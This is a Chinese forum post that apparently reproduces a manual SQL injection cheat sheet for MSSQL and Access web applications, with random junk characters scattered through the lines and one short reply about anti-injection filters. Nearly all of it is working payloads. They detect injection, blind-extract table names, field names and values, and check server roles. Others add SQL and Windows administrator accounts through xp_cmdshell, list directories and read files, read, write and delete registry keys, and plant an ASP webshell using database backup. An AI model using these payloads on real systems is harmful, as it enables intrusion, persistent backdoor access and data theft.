手工脚本注入

admin

手工脚本注入
% i' I8 E1 V" g/ Z8 I* h6 f1.判断是否有注入;and 1=1 ;and 1=2

2.初步判断是否是mssql ;and user>0

- x4 F1 {' K& m' T3.注入参数是字符'and [查询条件] and ''='
$ I7 h' \/ ~' j
' l9 g- X. ~& l3 l8 ]4.搜索时没过滤参数的'and [查询条件] and '%25'='
6 d" w1 c# w% H7 _
5.判断数据库系统
;and (select count(*) from sysobjects)>0 mssql
2 l* ?6 T5 C" G/ P;and (select count(*) from msysobjects)>0 access
. s/ }7 ]* U! x# ?
- ]( Y. q* R- m9 ?) Y2 z% e) m6.猜数据库 ;and (select Count(*) from [数据库名])>0

7.猜字段 ;and (select Count(字段名) from 数据库名)>0
( I6 Z3 ^8 S7 t6 S  r
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0

9.(1)猜字段的ascii值（access）
) e3 |: u, E9 D0 w2 B* z0 c;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0

(2)猜字段的ascii值（mssql）
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0

10.测试权限结构（mssql）
% m* ]# u; o3 G1 A8 p;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
4 D+ F( x8 E5 q; p6 h) b$ Z;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
+ S. C% C! I, h; E. A+ G# q! ]# u5 o;and 1=(select IS_MEMBER('db_owner'));--
! Q% {3 p; |* g* f9 H
9 {) y$ k+ [8 s8 n* [) [11.添加mssql和系统的帐户
;exec master.dbo.sp_addlogin username;--
; U+ A* Q9 z# a6 n4 l, w1 g" C5 H
;exec master.dbo.sp_password null,username,password;--
' P) P: U( D1 ^' p% ~
  G6 N( i9 j9 e$ y2 X" s" b# X;exec master.dbo.sp_addsrvrolemember sysadmin username;--

;exec master.dbo.xp_cmdshell 'net user username password
9 |  Y5 M) z/ [! ]/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';--
! f: K. C! z5 o  y- F
) q3 B7 E$ z  y( k;exec master.dbo.xp_cmdshell 'net user username password /add';--

- W/ L- L+ |- N8 O% z;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--

12.(1)遍历目录

;create table dirs(paths varchar(100), id int)
. b2 n8 o* Y* ^! [7 Y;insert dirs exec master.dbo.xp_dirtree 'c:\'
9 v( _+ e9 p0 A; i% V! M;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>)

(2)遍历目录
, ~7 S6 G4 @1 k  @;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表
$ h# L- `" _7 O$ d! W;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容

13.mssql中的存储过程

xp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值

xp_regread 根键,子键,键值名
;exec xp_regread
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值
2 }% v4 G7 _/ j) X
  }9 I; D# a; P4 lxp_regwrite 根键,子键, 值名, 值类型, 值
& `; L! ^( f2 C# d1 ^( T, M值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型
5 W- O  C( x& b$ A% G) a  ^6 K" ?;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表

xp_regdeletevalue 根键,子键,值名
/ ?# f" u% G0 J' ^/ M. W. N7 Y
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值

xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值

14.mssql的backup创建webshell
use model
create table cmd(str image);
0 t% [& u5 D: [- Q' t  Y% Zinsert into cmd(str) values ('');
backup database model to disk='c:\l.asp';

15.mssql内置函数
;and (select @@version)>0 获得Windows的版本号
/ P( ^# {- {. H% H. G/ M' Y) T;and user_name()='dbo' 判断当前系统的连接用户是不是sa
! l( o3 D5 g, Z;and (select user_name())>0 爆当前系统的连接用户
;and (select db_name())>0 得到当前连接的数据库

2 y, e0 G* [% v- J- f16.简洁的webshell
# V/ [* C2 o# O# S
+ j! T' ~6 W4 O- luse model

5 a& n% Q' M& V  c* y1 \/ |3 Mcreate table cmd(str image);

* P  Z9 I+ x0 C1 h' r- Ainsert into cmd(str) values ('');
$ A6 p% l5 u. C$ k
backup database model to disk='g:\wwwtest\l.asp';

/ i  N9 ~! `! t4 r* W

老男孩

现在很多防注入啊，有其他注入字符码